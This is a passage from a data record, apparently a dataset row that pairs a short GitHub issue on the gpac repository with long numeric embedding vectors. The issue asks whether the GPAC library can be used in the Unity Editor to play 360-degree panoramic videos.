-0.0046653770841658115, 0.00648935092613101, 0.0002802555973175913, -0.019016684964299202, 0.004831865895539522, 0.006370959337800741, 0.00963413342833519, 0.012246152386069298, -0.00429910235106945, 0.0035591537598520517, 0.0020644571632146835, 0.01392583642154932, 0.018483921885490417, -0.006256266962736845, 0.01106223464012146, -0.008235630579292774, 0.012438539415597916, 0.014207016676664352, -0.012527333572506905, -0.013185887597501278, 0.00913096871227026, -0.03445201739668846, -0.018927890807390213, 0.013703851960599422, 0.016826435923576355, 0.02216886542737484, 0.013400472700595856, -0.012268351390957832, -0.0005498744430951774, -0.01346706785261631, 0.023811552673578262, 0.003869932144880295, 0.0019608642905950546, -0.012423740699887276, 0.014828573912382126, -0.011114031076431274, -0.0026009201537817717, -0.00409191707149148, 0.05599932745099068, -0.003884731326252222, 0.02875441126525402, -0.0017962257843464613, 0.0011820682557299733, -0.0005706855445168912, -0.005153743550181389, -0.007499380968511105, 0.0044285934418439865, 0.0030226907692849636, -0.0058196973986923695, 0.0011663442710414529, 0.01725560612976551, -0.008413217961788177, -0.0029542455449700356, -0.0006021333392709494, 0.004151112865656614, -0.007059111725538969, 0.000560973712708801, -0.016930028796195984, -0.02299760840833187, 0.009323354810476303, 0.0327945314347744, -0.015198548324406147, -0.0036627466324716806, -0.006415355950593948, 0.016782039776444435, -0.012186956591904163, 0.011898376978933811, -0.007495681289583445, 0.030397096648812294, -0.008420617319643497, -0.011484005488455296, -0.004336100071668625, 0.007976648397743702, 0.02200607769191265, -0.0015714663313701749, 0.01713721454143524, 0.0014900718815624714, -0.0012033417588099837, -0.004824466072022915, 0.007454984355717897, -0.02512866072356701, 0.00429910235106945, 0.003995723556727171, 0.004476690199226141, -0.011165827512741089, 0.004558084532618523, 0.013015699572861195, 0.014687984250485897, 0.005079748574644327, 0.0047652702778577805, -0.008812790736556053, 0.01648605987429619, -0.009338153526186943, 0.017048420384526253, 0.011802183464169502, -0.016944827511906624, -0.01641206443309784, -0.016042090952396393, -0.011713389307260513, -0.009079172275960445, -0.00810983870178461, -0.015183749608695507, -0.021680500358343124, 0.0032594744116067886, 0.014843372628092766, 0.024625496938824654, -0.009907914325594902, 0.033327292650938034, 0.0036627466324716806, 0.005653209052979946, -0.019682638347148895, -0.0009179990156553686, -0.001567766536027193, -0.010721858590841293, 0.017669977620244026, 0.007273696828633547, 0.011439608410000801, 0.009523141197860241, -0.0015529675874859095, -0.007573375944048166, 0.01833593100309372, -0.005597712937742472, -0.007218200713396072, -0.007133106701076031, -0.011350814253091812, 0.0011432209284976125, -0.019904622808098793, 0.009582336992025375, 0.020392989739775658, -0.0004897536127828062, -0.013378274627029896, -0.010692260228097439, 0.0181435439735651, -0.0020385589450597763, 0.0002113478840328753, -0.010211293585598469, -0.00008555658132536337, 0.005187041126191616, 0.017640380188822746, 0.013607658445835114, -0.018779899924993515, 0.010825451463460922, 0.024373913183808327, 0.008768393658101559, 0.011565400287508965, -0.014347607269883156, 0.0008782267686910927, 0.005464522168040276, 0.021665701642632484, -0.01200936920940876, -0.015117154456675053, 0.013800045475363731, 0.023337984457612038, 0.007040612865239382, -0.005619911011308432, 0.0020681568421423435, 0.0182915348559618, 0.004151112865656614, -0.016589652746915817, -0.014821174554526806, 0.03764859586954117, 0.0190906785428524, 0.012342345900833607, -0.008775793015956879, -0.0076880683191120625, 0.01722600869834423, 0.003757090074941516, 0.0015252195298671722, -0.013356075622141361, -0.012579130008816719, 0.01718161068856716, 0.009530540555715561, -0.019712235778570175, 0.011920575052499771, -0.010485074482858181, 0.025350647047162056, 0.021443717181682587, -0.003585051978006959, -0.004891061689704657, 0.03936527669429779, -0.008257828652858734, 0.0065374476835131645, -0.015938498079776764, 0.025424640625715256, -0.011321216821670532, 0.01840992644429207, -0.022716429084539413, -0.005642109550535679, 0.004088216926902533, 0.02607579529285431, 0.014532594941556454, 0.0054793208837509155, -0.0025805714540183544, -0.005989885423332453, 0.0003274273476563394, 0.015553724020719528, 0.00362389930523932, -0.012090763077139854, 0.004717173520475626, 0.00150024623144418, 0.005505219101905823, 0.010988240130245686, 0.005649509374052286, 0.0015936647541821003, 0.0013235834194347262, -0.003518456593155861, 0.015183749608695507, 0.00039402273250743747, -0.03288332372903824, 0.0014392004813998938, 0.00008908289601095021, -0.008716597221791744, 0.014702782966196537, 0.013385673984885216, 0.014532594941556454, -0.0021754493936896324, 0.007998846471309662, 0.005508918780833483, 0.014806375838816166, -0.0037367413751780987, -0.01536133699119091, 0.01737399771809578, 0.046468786895275116, 0.0005193515680730343, -0.008605604991316795, -0.003818135941401124, 0.018069550395011902, -0.008546408265829086, -0.0006058330764062703, -0.022686829790472984, 0.0012810364132747054, -0.004036420956254005, -0.007776862010359764, 0.01061086542904377, 0.007665869779884815, 0.005124145653098822, 0.015746111050248146, -0.004484089557081461, 0.006422755774110556, -0.028369637206196785, -0.008435416035354137, 0.013881439343094826 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
May I use the GPAC library in Unity Editor to play 360 panoramic videos?
How to use GPAC in Unity
https://api.github.com/repos/gpac/gpac/issues/2457/comments
1
2023-05-04T10:15:15
2023-05-11T11:21:03Z
https://github.com/gpac/gpac/issues/2457
1,695,713,945
2,457
false
This is a GitHub Issue repo:gpac owner:gpac Title : How to use GPAC in Unity Issue date: --- start body --- May I use the GPAC library in Unity Editor to play 360 panoramic videos? --- end body ---
199
[ -0.018607595935463905, 0.033987630158662796, -0.024922391399741173, -0.014320552349090576, -0.011780600994825363, 0.018902286887168884, -0.04389484226703644, 0.05467209219932556, -0.04406323656439781, 0.049087006598711014, -0.0067217485047876835, 0.02019331231713295, 0.03612062707543373, -0.013661006465554237, -0.03278080374002457, 0.03221948817372322, -0.012334899976849556, 0.02685892954468727, -0.010622888803482056, 0.025427574291825294, 0.029974227771162987, -0.023715564981102943, -0.008686351589858532, 0.028374480083584785, 0.03320179134607315, -0.0008959115366451442, -0.012145455926656723, 0.00813205260783434, -0.004886949900537729, 0.010412395931780338, 0.010054557584226131, 0.006483189761638641, -0.02060026489198208, 0.0282902829349041, 0.03929205983877182, 0.006335844285786152, 0.037888772785663605, 0.01345051359385252, -0.021624665707349777, 0.003124069422483444, -0.02158256620168686, -0.022424539551138878, 0.01536600198596716, 0.024992555379867554, -0.03527865558862686, -0.018635662272572517, 0.010433444753289223, 0.0038099263329058886, -0.006921716965734959, -0.0408356748521328, 0.02361733466386795, -0.012622574344277382, 0.002929363399744034, -0.006739289965480566, -0.011815682984888554, -0.044961340725421906, 0.02110544964671135, -0.03036714904010296, 0.006227089557796717, 0.009907212108373642, 0.0070445048622787, 0.017653360962867737, -0.011991094797849655, 0.02434704452753067, -0.013682056218385696, 0.012580474838614464, -0.01070006936788559, 0.05528954043984413, 0.008910877630114555, 0.007928576320409775, 0.019477635622024536, 0.003743270179256797, -0.021133514121174812, 0.020095081999897957, 0.01064393762499094, -0.04229509457945824, 0.020838823169469833, 0.01299444492906332, -0.0048062605783343315, 0.02890772931277752, -0.03845008462667465, 0.015057277865707874, -0.043754514306783676, 0.0034134977031499147, -0.02197548747062683, -0.01916891150176525, -0.018172577023506165, -0.06326021254062653, 0.025722265243530273, 0.022845525294542313, 0.004002878442406654, 0.043866775929927826, 0.035447049885988235, -0.02267713099718094, 0.03721519187092781, 0.024122517555952072, -0.040555018931627274, -0.02172289602458477, -0.013604875653982162, -0.03224755451083183, 0.016320237889885902, -0.008686351589858532, -0.004237929359078407, -0.05441950261592865, 0.0005297411698848009, 0.006199024152010679, 0.04392290860414505, -0.021554501727223396, 0.011717453598976135, 0.04156538471579552, -0.010005442425608635, -0.010173836722970009, 0.024978522211313248, -0.014959048479795456, -0.004280027933418751, 0.028711268678307533, -0.05854516848921776, -0.06168853119015694, 0.0075216228142380714, -0.02368749864399433, -0.023827826604247093, -0.02471189759671688, -0.022761328145861626, 0.024683833122253418, -0.011871814727783203, 0.0748233050107956, -0.07016438990831375, -0.0008862639660947025, 0.00044773652916774154, 0.012398048304021358, -0.04681368172168732, 0.01149994321167469, 0.018200643360614777, -0.008553039282560349, 0.03988143801689148, 0.010068589821457863, -0.018677759915590286, 0.03889913856983185, 0.01713414490222931, 0.014278453774750233, -0.05542986840009689, -0.033117592334747314, 0.00591485807672143, -0.005486855283379555, -0.01898648403584957, -0.005802595056593418, 0.00460278382524848, 0.005665774457156658, -0.0024768030270934105, -0.004964130464941263, -0.017106078565120697, -0.0035257607232779264, -0.03842202201485634, -0.0438106469810009, 0.029300648719072342, -0.00040103335049934685, 0.00709011172875762, 0.000048731362767284736, -0.017400769516825676, 0.009135403670370579, 0.017049947753548622, -0.021863223984837532, 0.005293903406709433, 0.01654476299881935, 0.02343490719795227, -0.006900667678564787, 0.009507275186479092, 0.026353744789958, -0.008539006114006042, 0.01255942601710558, -0.026297613978385925, -0.005634200759232044, 0.031068792566657066, 0.03429635241627693, -0.03334211930632591, -0.056187644600868225, 0.048357296735048294, -0.0013094429159536958, -0.041425056755542755, -0.03345438092947006, -0.032387882471084595, -0.011528009548783302, 0.04644882678985596, 0.0387868769466877, -0.028051722794771194, 0.006107810419052839, 0.049339599907398224, -0.03480153903365135, -0.002974970266222954, -0.01581505313515663, 0.01563262566924095, 0.031040726229548454, 0.02358926832675934, -0.017653360962867737, 0.027069421485066414, -0.014846784994006157, -0.03199496120214462, -0.03224755451083183, -0.03687840327620506, 0.0013322463491931558, 0.002417163224890828, -0.024108484387397766, 0.022003553807735443, -0.010159803554415703, -0.03755198046565056, 0.02792542800307274, 0.024080418050289154, 0.04367031529545784, 0.014734522439539433, -0.007153259590268135, 0.005336001981049776, -0.016278138384222984, -0.013801335357129574, 0.014229338616132736, -0.026508105918765068, 0.008553039282560349, 0.0034626126289367676, -0.033005330711603165, -0.0030644298531115055, -0.00947920884937048, 0.016741223633289337, 0.020656397566199303, 0.0025329345371574163, -0.004395799245685339, -0.04417550191283226, 0.002775001572445035, 0.0008678457816131413, -0.0026522139087319374, 0.012173522263765335, -0.0025329345371574163, 0.029384847730398178, 0.04296867176890373, 0.002097915392369032, -0.004087075591087341, 0.0246417336165905, -0.01843920163810253, 0.017513031139969826, -0.015983447432518005, -0.008068905211985111, 0.04209863394498825, -0.026760699227452278, -0.0030188229866325855, -0.01633427105844021, 0.013899565674364567, -0.026522139087319374, 0.04341772571206093, -0.006570895202457905, 0.07196059823036194, -0.006577911786735058, -0.01399779599159956, 0.0014392470475286245, -0.026227449998259544, 0.03025488555431366, -0.0073462119325995445, 0.0024083927273750305, 0.021133514121174812, 0.030058424919843674, 0.0168815515935421, -0.004553669132292271, -0.04681368172168732, -0.023168282583355904, -0.006556862499564886, -0.00987914577126503, -0.023392807692289352, -0.008630219846963882, -0.04830116778612137, 0.004732588306069374, -0.009044189937412739, 0.009345896542072296, -0.02781316451728344, 0.006230597849935293, -0.006244630552828312, -0.025932759046554565, 0.029076123610138893, -0.03084426559507847, -0.011759552173316479, -0.019056648015975952, 0.0014699440216645598, 0.06286729127168655, -0.009696719236671925, 0.028304316103458405, -0.006665617227554321, -0.0066375513561069965, 0.018888253718614578, -0.018832122907042503, 0.004076551180332899, -0.0031328401528298855, 0.008279398083686829, -0.041060201823711395, 0.01588521897792816, 0.014096026308834553, 0.02314021624624729, -0.0383378230035305, 0.024543503299355507, 0.040947940200567245, 0.0254416074603796, -0.023491038009524345, 0.0015971169341355562, 0.02085285633802414, 0.013001461513340473, -0.029019992798566818, 0.001629567937925458, -0.014959048479795456, -0.018860187381505966, -0.049732521176338196, 0.009752850048244, -0.0122647350654006, 0.0017470932798460126, 0.0006691928720101714, -0.017148176208138466, 0.06758233904838562, -0.013562777079641819, -0.04852569103240967, 0.00564121687784791, 0.024627700448036194, 0.012124407105147839, -0.019674094393849373, -0.01836903765797615, -0.024838194251060486, 0.01891632005572319, 0.0019453077111393213, 0.013836418278515339, -0.03064780682325363, -0.004150223918259144, 0.02667650207877159, 0.007139226887375116, -0.04291254281997681, -0.0568050891160965, -0.025455640628933907, -0.01683945395052433, 0.01782175526022911, -0.016558796167373657, 0.04515780135989189, -0.002161063253879547, 0.04086374118924141, -0.050827085971832275, -0.02142820507287979, -0.017962083220481873, 0.022578900679945946, -0.014664357528090477, 0.007040996570140123, -0.002029505092650652, 0.023855892941355705, -0.000923538813367486, 0.00617797439917922, -0.04743112996220589, 0.01530987024307251, 0.0335385799407959, -0.0017856837948784232, 0.011057907715439796, 0.000831886543892324, 0.030591674149036407, 0.022045651450753212, -0.012068275362253189, 0.015730855986475945, 0.007486540358513594, 0.016418468207120895, -0.04052695259451866, 0.0004400622856337577, 0.009724784642457962, 0.025273213163018227, -0.032163355499506, 0.0017979624681174755, 0.05124806985259056, -0.013190905563533306, 0.03802910074591637, -0.0333140529692173, -0.033847302198410034, 0.0007108529680408537, -0.03084426559507847, -0.016811387613415718, -0.0021505386102944613, -0.06247437372803688, 0.025652101263403893, -0.03224755451083183, -0.0009516045683994889, -0.0068269954062998295, 0.010307149030268192, -0.020179279148578644, 0.0018155035795643926, -0.021189646795392036, 0.04260381683707237, 0.029356781393289566, -0.02001088485121727, 0.002136505674570799, 0.029076123610138893, 0.005970989819616079, -0.0016620190581306815, -0.010293115861713886, -0.026045022532343864, -0.03174237161874771, 0.021484335884451866, -0.023897990584373474, 0.008489890955388546, -0.055822789669036865, 0.01636233553290367, -0.03418409079313278, -0.019842490553855896, 0.006402500439435244, 0.019000517204403877, 0.017400769516825676, -0.01880405656993389, -0.007823329418897629, 0.014509996399283409, -0.021638698875904083, 0.0034836619161069393, -0.02299988642334938, 0.0024820652324706316, 0.04731886461377144, -0.0030521510634571314, -0.000649897672701627, -0.03724325820803642, -0.033229853957891464, -0.012159489095211029, 0.04440002515912056, 0.0035310229286551476, 0.008342546410858631, 0.04992898181080818, -0.0435861200094223, 0.025469673797488213, -0.005749971605837345, 0.0018365529831498861, -0.004304585512727499, -0.012096340768039227, -0.03188269957900047, 0.005006229504942894, 0.012292801402509212, 0.012082308530807495, -0.008230282925069332, -0.019926687702536583, 0.028963860124349594, -0.040947940200567245, 0.008496907539665699, -0.03511026129126549, 0.014874850399792194, 0.007654935121536255, -0.013864483684301376, -0.005055344197899103, 0.02026347629725933, 0.018719859421253204, -0.02033364027738571, 0.026886994019150734, 0.01818661019206047, 0.0027609688695520163, 0.04653302580118179, -0.02861303836107254, -0.03028295189142227, -0.03749585151672363, 0.04173377901315689, -0.00889684446156025, -0.0003880967851728201, 0.008763532154262066, 0.01359785906970501, -0.03011455573141575, -0.0282902829349041, 0.008153102360665798, -0.032640475779771805, 0.02161063253879547, 0.020908989012241364, 0.005721906200051308, -0.0009963343618437648, 0.012797985225915909, 0.016095710918307304, 0.010966693982481956, 0.0032643983140587807, -0.01596941612660885, -0.04964832216501236, -0.03561544418334961, -0.0004400622856337577, 0.0011998111149296165, 0.014790653251111507, 0.0038274675607681274, 0.05377398803830147, 0.01354172732681036, -0.01006157323718071, -0.03889913856983185, 0.028332380577921867, -0.04319319874048233, 0.023392807692289352, -0.050686754286289215, 0.00011829278082586825, 0.0123769985511899, 0.004802752751857042, -0.003957271575927734, -0.03365084156394005, -0.03671000897884369, 0.024080418050289154, -0.007956641726195812, -0.009598488919436932, -0.007072570733726025, 0.03306145966053009, 0.03028295189142227, -0.010763217695057392, -0.0015497560380026698, 0.008139069192111492, 0.0034170057624578476, 0.016502665355801582, 0.039207860827445984, 0.03283693641424179, 0.024725930765271187, -0.014608225785195827, 0.004125666338950396, -0.008419726975262165, -0.04195830598473549, 0.05402658134698868, 0.0007547057466581464, -0.0003067499492317438, 0.01633427105844021, -0.034941866993904114, -0.009458160027861595, -0.02678876370191574, -0.0027381654363125563, 0.010489576496183872, -0.0048588840290904045, -0.012313850224018097, -0.016825420781970024, 0.0026241482701152563, 0.00469399755820632, 0.040077898651361465, -0.011226302944123745, -0.020937053486704826, -0.0034678750671446323, -0.007654935121536255, 0.020908989012241364, -0.0017584949964657426, 0.043726447969675064, -0.01763932779431343, -0.015043245628476143, 0.031209120526909828, -0.021273843944072723, -0.023420874029397964, -0.022466637194156647, -0.018018215894699097, 0.01768142729997635, 0.0069182091392576694, 0.0066831582225859165, 0.004318618215620518, -0.01445386465638876, 0.029216451570391655, -0.0150011470541358, -0.06623518466949463, 0.033622775226831436, -0.035306721925735474, -0.0062165651470422745, -0.014096026308834553, -0.00011555197852430865, 0.024739963933825493, -0.016965750604867935, 0.0009279240621253848, 0.03965691477060318, 0.006841028109192848, -0.03157397732138634, 0.005662266165018082, 0.018144510686397552, -0.00046615468454547226, -0.00008978849655250087, 0.02810785546898842, 0.004497537389397621, 0.005360559560358524, -0.01186479814350605, 0.02671859972178936, -0.009030156768858433, 0.009212584234774113, -0.004009895026683807, -0.01106492429971695, -0.007458474952727556, -0.01549229770898819, 0.01476258784532547, -0.004522094968706369, -0.018579531461000443, 0.001869881059974432, -0.0262414813041687, 0.025497740134596825, 0.03342631459236145, 0.013064609840512276, -0.00712519371882081, 0.01928117498755455, 0.008672318421304226, -0.007654935121536255, 0.025904692709445953, -0.008447792381048203, -0.0054166908375918865, -0.024627700448036194, 0.01615184359252453, 0.0036450400948524475, -0.0020031933672726154, -0.005620167590677738, -0.00654282933101058, -0.02719571813941002, -0.029188387095928192, -0.002092652954161167, 0.008075921796262264, 0.0074233924970030785, -0.017260439693927765, 0.018860187381505966, -0.01695171743631363, 0.02857094071805477, 0.02249470353126526, 0.0059359073638916016, -0.050321899354457855, -0.018944386392831802, 0.021708862856030464, -0.017162209376692772, 0.002741673495620489, -0.03881493955850601, -0.008658286184072495, 0.02165273018181324, 0.005872759502381086, -0.020754626020789146, 0.025722265243530273, 0.010994760319590569, 0.033594708889722824, 0.0435861200094223, -0.001561157638207078, -0.017232375219464302, 0.008012773469090462, -0.02386992610991001, 0.009331864304840565, -0.018312906846404076, 0.016095710918307304, -0.0017628803616389632, -0.012236669659614563, 0.020221376791596413, -0.040302425622940063, 0.021933387964963913, 0.04369838163256645, -0.005946432240307331, -0.0009305552230216563, 0.002389097586274147, 0.0030082983430474997, 0.01142977923154831, 0.015534396283328533, -0.03320179134607315, -0.013289135880768299, -0.025385476648807526, -0.00343103869818151, 0.005528953857719898, -0.03188269957900047, -0.013969730585813522, 0.02810785546898842, -0.010531675070524216, -0.0009621292119845748, -0.02019331231713295, 0.04546652361750603, -0.003957271575927734, 0.022326309233903885, -0.010496593080461025, -0.038253623992204666, -0.0035994332283735275, 0.008931927382946014, -0.0419863723218441, -0.024318978190422058, 0.020024918019771576, 0.026985224336385727, 0.023715564981102943, -0.009949310682713985, 0.014074976556003094, 0.01654476299881935, -0.0013471563579514623, -0.0279534924775362, -0.01932327263057232, 0.003395956475287676, 0.012054242193698883, -0.013661006465554237, -0.005623675882816315, 0.016797354444861412, -0.022536803036928177, 0.0025153933092951775, -0.016811387613415718, 0.004108124878257513, 0.047908246517181396, -0.00605167867615819, -0.0013699596747756004, -0.013036543503403664, 0.0001572120818309486, 0.004115141462534666, -0.01091757882386446, 0.0015322149265557528, 0.01414514146745205, -0.007040996570140123, 0.0047676702961325645, -0.026732632890343666, 0.032640475779771805, -0.019491666927933693, -0.032135289162397385, 0.018818089738488197, 0.005820136051625013, -0.005385117139667273, -0.008356578648090363, -0.01761126145720482, 0.03713099658489227, 0.008686351589858532, 0.020979152992367744, 0.02879546582698822, -0.023954123258590698, -0.021919354796409607, 0.030423279851675034, 0.008510940708220005, 0.01385045051574707, 0.000786718213930726, -0.011303483508527279, -0.011471877805888653, 0.016825420781970024, -0.027322012931108475, -0.0008353947778232396, 0.0009375716908834875, 0.007040996570140123, 0.019702160730957985, -0.05127613618969917, 0.022438572719693184, -0.0011980569688603282, 0.027139585465192795, -0.019000517204403877, 0.0255538709461689, -0.013352283276617527, 0.007781230844557285, -0.015113409608602524, -0.0230419859290123, -0.019407469779253006, 0.029244517907500267, 0.001663773087784648, -0.014538061805069447, -0.03306145966053009, -0.024501405656337738, -0.00252942624501884, 0.007191849872469902, 0.019435536116361618, -0.029188387095928192, 0.008510940708220005, 0.0006512132240459323, -0.012440146878361702, -0.02763073705136776, 0.04479294642806053, 0.016741223633289337, -0.015057277865707874, -0.02194742113351822, -0.021708862856030464, 0.008840713649988174, 0.0008305709925480187, 0.0017374457092955709, 0.016642993316054344, -0.004406323656439781, 0.008468842133879662, -0.00712519371882081, 0.0114648612216115, -0.044961340725421906, -0.01470645610243082, 0.012931297533214092, -0.014552094973623753, -0.01665702648460865, 0.03157397732138634, 0.02685892954468727, -0.006609485484659672, -0.041789911687374115, 0.034240223467350006, -0.0004832572303712368, 0.03345438092947006, 0.013317201286554337, -0.011331548914313316, -0.028963860124349594, 0.022480670362710953, 0.013436480425298214, -0.03575577214360237, -0.0026416892651468515, -0.003232824383303523, 0.0031661682296544313, 0.016306204721331596, -0.026957159861922264, 0.019267141819000244, -0.024122517555952072, 0.006844536401331425, -0.013829401694238186, -0.013822385109961033, -0.011380664072930813, -0.005809611640870571, -0.010931611992418766, -0.030675871297717094, -0.0035082194954156876, -0.01501517929136753, -0.017442867159843445, -0.015646658837795258, 0.0029837407637387514, -0.03255627676844597, 0.013611892238259315, 0.013169855810701847, -0.04223896190524101, 0.01179463416337967, -0.008426743559539318, -0.003652056446298957, 0.013099691830575466, 0.02085285633802414, 0.0030539052095264196, 0.010419411584734917, -0.009528324007987976, 0.028767399489879608, 0.0034012189134955406, 0.0237295962870121, 0.0005727168172597885, -0.021442238241434097, -0.01775159128010273, 0.01731657236814499, 0.007935592904686928, -0.0036450400948524475, -0.029216451570391655, 0.013766253367066383, 0.020642364397644997, -0.04355805367231369, 0.006521780043840408, -0.001317336456850171, 0.017962083220481873, -0.009773899801075459, -0.001744462177157402, 0.0065393210388720036, -0.021498369053006172, 0.024248814210295677, -0.0048202937468886375, 0.024515438824892044, 0.028823532164096832, -0.0029960195533931255, 0.04487714543938637, -0.02343490719795227, 0.011036858893930912, 0.039235927164554596, -0.01241208054125309, 0.008777565322816372, -0.036289021372795105, 0.0006262171664275229, 0.033847302198410034, 0.026199383661150932, 0.01030013244599104, 0.029440978541970253, 0.04148118942975998, -0.02514691837131977, 0.01636233553290367, -0.005269345827400684, 0.036653876304626465, -0.007675984408706427, 0.002964445622637868, 0.005279870238155127, 0.03280887007713318, -0.039095599204301834, -0.019449569284915924, -0.009682686068117619, -0.023462971672415733, 0.01571682281792164, -0.0016716666286811233, 0.014734522439539433, -0.01683945395052433, -0.013183888979256153, 0.024697866290807724, 0.018130479380488396, -0.02347700484097004, 0.029132254421710968, 0.04919927194714546, 0.004641374573111534, 0.019182944670319557, -0.03140558302402496, -0.00559561001136899, 0.010938628576695919, -0.0067813885398209095, 0.02067042887210846, -0.018060313537716866, -0.0069111925549805164, -0.015057277865707874, 0.0016909617697820067, -0.039853375405073166, 0.0027381654363125563, -0.03196689486503601, -0.011549058370292187, 0.016025546938180923, -0.05512114614248276, 0.000991949113085866, -0.00957042258232832, 0.022059684619307518, -0.016278138384222984, 0.02067042887210846, -0.028051722794771194, -0.027714934200048447, -0.015506329946219921, -0.01299444492906332, -0.01709204539656639, -0.007956641726195812, -0.016165874898433685, 0.002285605063661933, -0.008609171025454998, -0.021091416478157043, 0.01357680931687355, -0.04773985221982002, -0.010166820138692856, 0.0033485954627394676, -0.010594823397696018, -0.003534531220793724, -0.027307981625199318, -0.015534396283328533, 0.02060026489198208, 0.03805716708302498, -0.022649064660072327, -0.010587806813418865, -0.011535026133060455, -0.009023141115903854, -0.015085344202816486, -0.0021417681127786636, 0.013148806989192963, 0.0005674544954672456, 0.00655335420742631, 0.0015629117842763662, 0.01305057667195797, 0.0012173522263765335, -0.013204938732087612, 0.010994760319590569, -0.00044707872439175844, -0.009409044869244099, 0.0031837092246860266, -0.03415602445602417, -0.03283693641424179, -0.0010971956653520465, -0.038478150963783264, 0.00003626073885243386, 0.022592933848500252, 0.03429635241627693, -0.00759178726002574, 0.01091757882386446, 0.0007797018042765558, 0.019982818514108658, -0.013555760495364666, -0.004037960898131132, -0.010272067040205002, 0.005360559560358524, 0.010377313010394573, 0.003697663312777877, -0.015646658837795258, 0.005942923948168755, 0.0006463894387707114, -0.01815854385495186, 0.03137751668691635, -0.022929722443223, 0.001561157638207078, -0.018060313537716866, -0.001311197062022984, -0.05599118396639824, -0.0006082375766709447, -0.017962083220481873, 0.013927632011473179, -0.011261384934186935, -0.009963343851268291, 0.0030135605484247208, -0.021498369053006172, 0.011310500092804432, -0.019814424216747284, -0.03244401514530182, -0.012797985225915909, -0.018860187381505966, -0.037159062922000885, 0.0011138597037643194, -0.022929722443223, 0.02690102718770504, -0.002303146058693528, 0.009535340592265129, 0.013387366198003292, 0.029581306502223015, -0.021161580458283424, 0.027546539902687073, -0.012980412691831589, -0.008567072451114655, 0.013275102712213993, 0.020656397566199303, 0.012727820314466953, 0.0049957046285271645, 0.01241208054125309, -0.012222636491060257, -0.002918838756158948, -0.012398048304021358, 0.018214676529169083, 0.019477635622024536, 0.043137066066265106, 0.027125554159283638, -0.01439773291349411, -0.005949940532445908, -0.03707486391067505, -0.010054557584226131, 0.000141096199513413, -0.006276204716414213, 0.058264508843421936, -0.01378028653562069, -0.01617990806698799, -0.02062833122909069, -0.0049957046285271645, -0.0011375402100384235, 0.0012033192906528711, 0.00532196881249547, -0.02008104883134365, 0.023462971672415733, 0.0177936889231205, -0.05015350505709648, 0.05554213002324104, 0.009773899801075459, 0.011633256450295448, 0.020473970100283623, -0.02471189759671688, -0.021414171904325485, 0.011570108123123646, -0.0007082218071445823, -0.003911664709448814, -0.02405235357582569, 0.005749971605837345, 0.0047220634296536446, 0.015772955492138863, 0.035811904817819595, 0.0019330289214849472, 0.011261384934186935, -0.01476258784532547, -0.0017111341003328562, -0.01658686250448227, -0.0067673553712666035, -0.01299444492906332, 0.00667964993044734, -0.043642252683639526, 0.014959048479795456, 0.014987113885581493, 0.010356264188885689, -0.0010664986912161112, -0.0031152989249676466, 0.025722265243530273, -0.011724469251930714, -0.0021768503356724977, 0.019070681184530258, -0.014874850399792194, 0.0050413114950060844, 0.031293317675590515, -0.0016716666286811233, 0.00834956206381321, 0.02238244004547596, 0.010272067040205002, 0.0220175851136446, 0.008153102360665798, -0.030339082702994347, -0.013099691830575466, -0.06578613072633743, -0.02215791493654251, 0.007956641726195812, 0.023462971672415733, 0.011878831312060356, -0.016278138384222984, -0.011913913302123547, -0.017007848247885704, -0.027237815782427788, 0.015169541351497173, 0.027785098180174828, -0.005749971605837345, -0.01742883399128914, -0.00528688682243228, -0.00501324562355876, 0.06735781580209732, -0.0237295962870121, 0.031181056052446365, -0.03864654526114464, -0.0010401870822533965, 0.0312652513384819, 0.0018997008446604013, 0.007844379171729088, -0.01891632005572319, -0.003995861858129501, 0.012068275362253189, -0.010889513418078423, -0.008251332677900791, 0.00013210639008320868, -0.011457844637334347, 0.00550439627841115, 0.016011513769626617, 0.024810127913951874, -0.003676614025607705, 0.001624305616132915, -0.007111161015927792, -0.0068655856885015965, 0.019702160730957985, -0.02252276986837387, 0.014776621013879776, -0.012692738324403763, 0.01388553250581026, -0.018944386392831802, -0.02208775095641613, -0.02067042887210846, 0.01164728868752718, 0.013092675246298313, -0.03828169032931328, -0.022719230502843857, 0.01330316811800003, 0.0007393572595901787, 0.03614869341254234, -0.004188814200460911, -0.020838823169469833, 0.01357680931687355, 0.0022189489100128412, -0.021863223984837532, -0.03547511622309685, 0.006444599479436874, -0.016250072047114372, 0.05012544244527817, 0.00726201431825757, -0.010286099277436733, 0.006504239048808813, 0.0139767462387681, -0.011071940883994102, 0.011142104864120483, -0.018214676529169083, 0.015730855986475945, -0.005700856912881136, 0.01953376643359661, -0.009437110275030136, -0.013899565674364567, -0.016713157296180725, 0.004413340240716934, -0.01501517929136753, 0.0056587583385407925, -0.001692715915851295, 0.010454494506120682, -0.0068726022727787495, 0.0018049789359793067, 0.016011513769626617, 0.01599748060107231, -0.0019979309290647507, -0.002222456969320774, -0.041312795132398605, -0.005535970441997051, -0.0033328086137771606, -0.016165874898433685, -0.006483189761638641, -0.03415602445602417, 0.00605167867615819, -0.0019400453893467784, 0.0005521060666069388, 0.009549373760819435, -0.009402028284966946, 0.017148176208138466, -0.0015927316853776574, 0.007879461161792278, 0.01265063975006342, -0.003050396917387843, -0.004269503057003021, 0.006556862499564886, -0.019337305799126625, -0.020796725526452065, -0.008854745887219906, 0.02288762480020523, -0.004023927729576826, -0.019617963582277298, 0.011240335181355476, 0.009282749146223068, -0.015057277865707874, 0.03247208148241043, 0.007563721388578415, 0.0122647350654006, 0.007019947282969952, -0.014467897824943066, 0.011022825725376606, 0.010103671811521053, -0.019674094393849373, -0.0043852743692696095, -0.017695458605885506, 0.013408415019512177, -0.0038274675607681274, 0.01633427105844021, -0.007023455575108528, -0.03662581369280815, 0.006013088393956423, 0.003176692873239517, 0.01554842945188284, 0.004665932152420282, -0.00825834833085537, 0.00505885249003768, 0.0007165538263507187, -0.0017479703528806567, 0.016165874898433685, -0.024220747873187065, -0.0074304090812802315, -0.0003806418098974973, -0.016320237889885902, 0.009535340592265129, -0.0003830537316389382, -0.00025916972663253546, 0.015576494857668877, -0.012068275362253189, -0.005672791041433811, -0.018607595935463905, -0.01255942601710558, 0.02434704452753067, -0.016825420781970024, 0.005953448358923197, 0.025595970451831818, 0.032163355499506, 0.01622200757265091, -0.006016596686094999, -0.011584141291677952, 0.014664357528090477, -0.010552724823355675, -0.002227719407528639, -0.003908156417310238, 0.013569792732596397, 0.027069421485066414, 0.00338543183170259, 0.010763217695057392, 0.025960825383663177, 0.009233633987605572, 0.0036660893820226192, 0.012271751649677753, -0.005350034683942795, 0.01676928997039795, -0.013829401694238186, -0.003048642771318555, 0.009177502244710922, -0.04232316091656685, 0.0029854949098080397, 